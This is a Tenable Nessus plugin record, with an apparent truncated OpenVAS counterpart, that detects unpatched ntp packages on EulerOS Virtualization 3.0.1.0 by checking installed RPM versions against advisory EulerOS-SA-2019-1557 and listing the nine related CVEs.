ID EULEROS_SA-2019-1557.NASL Type nessus Reporter This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-05-14T00:00:00
Description
According to the versions of the ntp packages installed, the EulerOS
Virtualization installation on the remote host is affected by the
following vulnerabilities :
It was found that ntpd did not check whether a Message
Authentication Code (MAC) was present in a received
packet when ntpd was configured to use symmetric
cryptographic keys. A man-in-the-middle attacker could
use this flaw to send crafted packets that would be
accepted by a client or a peer without the attacker
knowing the symmetric key.(CVE-2015-1798)
A missing return statement in the receive() function
could potentially allow a remote attacker to bypass
NTP's authentication mechanism.(CVE-2014-9296)
The rate limiting feature in NTP 4.x before 4.2.8p4 and
4.3.x before 4.3.77 allows remote attackers to have
unspecified impact via a large number of crafted
requests.(CVE-2015-7705)
The datalen parameter in the refclock driver in NTP
4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows
remote attackers to execute arbitrary code or cause a
denial of service (crash) via a negative input
value.(CVE-2015-7853)
Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,
and 4.3.x before 4.3.77 allows remote attackers to
bypass authentication.(CVE-2015-7871)
The protocol engine in ntp 4.2.6 before 4.2.8p11 allows
a remote attackers to cause a denial of service
(disruption) by continually sending a packet with a
zero-origin timestamp and source IP address of the
''other side'' of an interleaved association causing
the victim ntpd to reset its
association.(CVE-2018-7185)
The ntpq saveconfig command in NTP 4.1.2, 4.2.x before
4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not
properly filter special characters, which allows
attackers to cause unspecified impact via a crafted
filename.(CVE-2015-7976)
ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before
4.3.77 allows remote authenticated users to cause a
denial of service (infinite loop or crash) by pointing
the key file at the log file.(CVE-2015-7850)
The decodenetnum function in ntpd in NTP 4.2.x before
4.2.8p4, and 4.3.x before 4.3.77 allows remote
attackers to cause a denial of service (assertion
failure) via a 6 or mode 7 packet containing a long
data value.(CVE-2015-7855)
Note that Tenable Network Security has extracted the preceding
description block directly from the EulerOS security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(125010);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id(
"CVE-2014-9296",
"CVE-2015-1798",
"CVE-2015-7705",
"CVE-2015-7850",
"CVE-2015-7853",
"CVE-2015-7855",
"CVE-2015-7871",
"CVE-2015-7976",
"CVE-2018-7185"
);
script_bugtraq_id(
71758,
73951
);
script_name(english:"EulerOS Virtualization 3.0.1.0 : ntp (EulerOS-SA-2019-1557)");
script_summary(english:"Checks the rpm output for the updated packages.");
script_set_attribute(attribute:"synopsis", value:
"The remote EulerOS Virtualization host is missing multiple security
updates.");
script_set_attribute(attribute:"description", value:
"According to the versions of the ntp packages installed, the EulerOS
Virtualization installation on the remote host is affected by the
following vulnerabilities :
- It was found that ntpd did not check whether a Message
Authentication Code (MAC) was present in a received
packet when ntpd was configured to use symmetric
cryptographic keys. A man-in-the-middle attacker could
use this flaw to send crafted packets that would be
accepted by a client or a peer without the attacker
knowing the symmetric key.(CVE-2015-1798)
- A missing return statement in the receive() function
could potentially allow a remote attacker to bypass
NTP's authentication mechanism.(CVE-2014-9296)
- The rate limiting feature in NTP 4.x before 4.2.8p4 and
4.3.x before 4.3.77 allows remote attackers to have
unspecified impact via a large number of crafted
requests.(CVE-2015-7705)
- The datalen parameter in the refclock driver in NTP
4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows
remote attackers to execute arbitrary code or cause a
denial of service (crash) via a negative input
value.(CVE-2015-7853)
- Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,
and 4.3.x before 4.3.77 allows remote attackers to
bypass authentication.(CVE-2015-7871)
- The protocol engine in ntp 4.2.6 before 4.2.8p11 allows
a remote attackers to cause a denial of service
(disruption) by continually sending a packet with a
zero-origin timestamp and source IP address of the
''other side'' of an interleaved association causing
the victim ntpd to reset its
association.(CVE-2018-7185)
- The ntpq saveconfig command in NTP 4.1.2, 4.2.x before
4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not
properly filter special characters, which allows
attackers to cause unspecified impact via a crafted
filename.(CVE-2015-7976)
- ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before
4.3.77 allows remote authenticated users to cause a
denial of service (infinite loop or crash) by pointing
the key file at the log file.(CVE-2015-7850)
- The decodenetnum function in ntpd in NTP 4.2.x before
4.2.8p4, and 4.3.x before 4.3.77 allows remote
attackers to cause a denial of service (assertion
failure) via a 6 or mode 7 packet containing a long
data value.(CVE-2015-7855)
Note that Tenable Network Security has extracted the preceding
description block directly from the EulerOS security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.");
# https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1557
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?976b810f");
script_set_attribute(attribute:"solution", value:
"Update the affected ntp packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"patch_publication_date", value:"2019/05/09");
script_set_attribute(attribute:"plugin_publication_date", value:"2019/05/14");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:ntp");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:ntpdate");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:sntp");
script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:uvp:3.0.1.0");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Huawei Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/uvp_version");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/EulerOS/release");
if (isnull(release) || release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS");
uvp = get_kb_item("Host/EulerOS/uvp_version");
if (uvp != "3.0.1.0") audit(AUDIT_OS_NOT, "EulerOS Virtualization 3.0.1.0");
if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu);
flag = 0;
pkgs = ["ntp-4.2.6p5-28.h8",
"ntpdate-4.2.6p5-28.h8",
"sntp-4.2.6p5-28.h8"];
foreach (pkg in pkgs)
if (rpm_check(release:"EulerOS-2.0", reference:pkg)) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : rpm_report_get()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ntp");
}
{"id": "EULEROS_SA-2019-1557.NASL", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.1.0 : ntp (EulerOS-SA-2019-1557)", "description": "According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - It was found that ntpd did not check whether a Message\n Authentication Code (MAC) was present in a received\n packet when ntpd was configured to use symmetric\n cryptographic keys. A man-in-the-middle attacker could\n use this flaw to send crafted packets that would be\n accepted by a client or a peer without the attacker\n knowing the symmetric key.(CVE-2015-1798)\n\n - A missing return statement in the receive() function\n could potentially allow a remote attacker to bypass\n NTP's authentication mechanism.(CVE-2014-9296)\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.(CVE-2015-7705)\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.(CVE-2015-7853)\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.(CVE-2015-7871)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n ''other side'' of an interleaved association causing\n the victim ntpd to reset its\n association.(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.(CVE-2015-7850)\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.(CVE-2015-7855)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2019-05-14T00:00:00", "modified": "2019-05-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/125010", "reporter": "This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?976b810f"], "cvelist": ["CVE-2014-9296", "CVE-2015-7855", "CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-1798", "CVE-2015-7850", "CVE-2015-7853"], "type": "nessus", "lastseen": "2021-01-07T08:58:06", "edition": 18, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310140060", "OPENVAS:1361412562311220191557", "OPENVAS:1361412562311220191230", "OPENVAS:1361412562310131123", "OPENVAS:1361412562311220191719", "OPENVAS:1361412562311220191222", "OPENVAS:1361412562310842504", "OPENVAS:1361412562310105668", "OPENVAS:1361412562311220192066", "OPENVAS:1361412562311220191323"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_C4A18A1277FC11E5A687206A8A720317.NASL", "AIX_IV79942.NASL", "EULEROS_SA-2019-1222.NASL", "EULEROS_SA-2019-1323.NASL", "AIX_IV79946.NASL", "OPENSUSE-2015-767.NASL", "EULEROS_SA-2019-2066.NASL", "SUSE_SU-2015-2058-1.NASL", "EULEROS_SA-2019-1230.NASL", "EULEROS_SA-2019-1719.NASL"]}, {"type": "cve", "idList": ["CVE-2015-7853", "CVE-2015-7976", "CVE-2015-7705", "CVE-2015-7855", "CVE-2015-7871", "CVE-2018-7185", "CVE-2014-9296", "CVE-2015-1798", "CVE-2015-7850"]}, {"type": "f5", "idList": ["F5:K15933", "F5:K17525", "F5:K17528", "F5:K17515", "SOL15933", "F5:K21230183", "SOL17525", "F5:K17527", "SOL17528", "F5:K17518"]}, {"type": "symantec", "idList": ["SMNTC-103339", "SMNTC-1335"]}, {"type": "freebsd", "idList": ["C4A18A12-77FC-11E5-A687-206A8A720317"]}, {"type": "archlinux", "idList": ["ASA-201510-14"]}, {"type": "cisco", "idList": ["CISCO-SA-20150408-CVE-2015-1798", "CISCO-SA-20151021-NTP"]}, {"type": "aix", "idList": ["NTP_ADVISORY4.ASC"]}, {"type": "ics", "idList": ["ICSA-15-356-01"]}, {"type": "slackware", "idList": ["SSA-2015-302-03"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14751", "SECURITYVULNS:DOC:32649"]}, {"type": "ubuntu", "idList": ["USN-2783-1"]}, {"type": "talos", "idList": ["TALOS-2016-0073", "TALOS-2015-0064", "TALOS-2015-0069", "TALOS-2015-0055"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139925"]}, {"type": "exploitdb", "idList": ["EDB-ID:40840"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C0EA9468AC06752131FCBEB9976AF6EC"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/NTP/NTP_NAK_TO_THE_FUTURE"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:1680-1", "SUSE-SU-2014:1690-1", "SUSE-SU-2016:1311-1", "OPENSUSE-SU-2014:1670-1", "SUSE-SU-2016:1912-1", "SUSE-SU-2016:1247-1"]}, {"type": "threatpost", "idList": ["THREATPOST:5769C48C396166703CD9313DCCE52178"]}], "modified": "2021-01-07T08:58:06", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-07T08:58:06", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125010);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-9296\",\n \"CVE-2015-1798\",\n \"CVE-2015-7705\",\n \"CVE-2015-7850\",\n \"CVE-2015-7853\",\n \"CVE-2015-7855\",\n \"CVE-2015-7871\",\n \"CVE-2015-7976\",\n \"CVE-2018-7185\"\n );\n script_bugtraq_id(\n 71758,\n 73951\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : ntp (EulerOS-SA-2019-1557)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - It was found that ntpd did not check whether a Message\n Authentication Code (MAC) was present in a received\n packet when ntpd was configured to use symmetric\n cryptographic keys. A man-in-the-middle attacker could\n use this flaw to send crafted packets that would be\n accepted by a client or a peer without the attacker\n knowing the symmetric key.(CVE-2015-1798)\n\n - A missing return statement in the receive() function\n could potentially allow a remote attacker to bypass\n NTP's authentication mechanism.(CVE-2014-9296)\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.(CVE-2015-7705)\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.(CVE-2015-7853)\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.(CVE-2015-7871)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n ''other side'' of an interleaved association causing\n the victim ntpd to reset its\n association.(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.(CVE-2015-7850)\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.(CVE-2015-7855)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1557\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?976b810f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h8\",\n \"ntpdate-4.2.6p5-28.h8\",\n \"sntp-4.2.6p5-28.h8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "naslFamily": "Huawei Local Security Checks", "pluginID": "125010", "cpe": ["p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:ntp", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:sntp"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}
{"openvas": [{"lastseen": "2020-01-27T18:36:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9296", "CVE-2015-7855", "CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-1798", "CVE-2015-7850", "CVE-2015-7853"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191557", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1557)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1557\");\n script_version(\"2020-01-23T12:14:39+0000\");\n script_cve_id(\"CVE-2014-9296\", \"CVE-2015-1798\", \"CVE-2015-7705\", \"CVE-2015-7850\", \"CVE-2015-7853\", \"CVE-2015-7855\", \"CVE-2015-7871\", \"CVE-2015-7976\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:14:39 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:14:39 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1557)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1557\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1557\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-1557 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that ntpd did not check whether a Message Authentication Code (MAC) was present in a received packet when ntpd was configured to use symmetric cryptographic keys. A man-in-the-middle attacker could use this flaw to send crafted packets that would be accepted by a client or a peer without the attacker knowing the symmetric key.(CVE-2015-1798)\n\nA missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism.(CVE-2014-9296)\n\nThe rate limiting feature in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to have unspecified impact via a large number of crafted requests.(CVE-2015-7705)\n\nThe datalen parameter in the refclock driver in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative input value.(CVE-2015-7853)\n\nCrypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to bypass authentication.(CVE-2015-7871)\n\nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the ''other side'' of an interleaved association causing the victim ntpd to reset its association.(CVE-2018-7185)\n\nThe ntpq saveconfig command in NTP 4.1.2, 4.2.x before 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not properly filter special characters, which allows attackers to cause unspecified impact via a crafted filename.(CVE-2015-7976)\n\nntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote authenticated users to cause a denial of service (infinite loop or crash) by pointing the key file at the log file.(CVE-2015-7850)\n\nThe decodenetnum function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (assertion failure) via a 6 or mode 7 packet containing a long data value.(CVE-2015-7855)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h8\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h8\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h8\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7853"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192066", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192066", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-2066)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2066\");\n script_version(\"2020-01-23T12:32:53+0000\");\n script_cve_id(\"CVE-2015-7705\", \"CVE-2015-7850\", \"CVE-2015-7853\", \"CVE-2015-7855\", \"CVE-2015-7871\", \"CVE-2015-7976\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:32:53 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:32:53 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-2066)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n 